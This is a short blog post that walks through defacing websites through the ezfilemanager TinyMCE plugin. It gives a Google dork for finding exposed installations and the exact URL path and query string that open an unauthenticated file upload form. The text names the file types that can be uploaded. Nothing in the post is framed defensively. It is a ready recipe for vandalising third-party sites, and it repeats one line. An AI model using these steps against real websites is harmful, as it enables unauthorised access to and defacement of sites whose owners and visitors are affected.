Google dork for EzFilemanager is “ inurl:ezfilemanager/ezfilemanager.php ”
(you can modify this dork for getting mor results from Google )
Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
put ?sa=1&type=file after URL
now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
now see the upload option and you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
- See more at: http://www.hackforsecurity.net/2012/01/ezfilemanager-deface-upload.html#sthash.YEbHKvWY.dpuf
now see the upload option and you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
0 Response to "EzFilemanager Deface Upload Vulnerability"
Post a Comment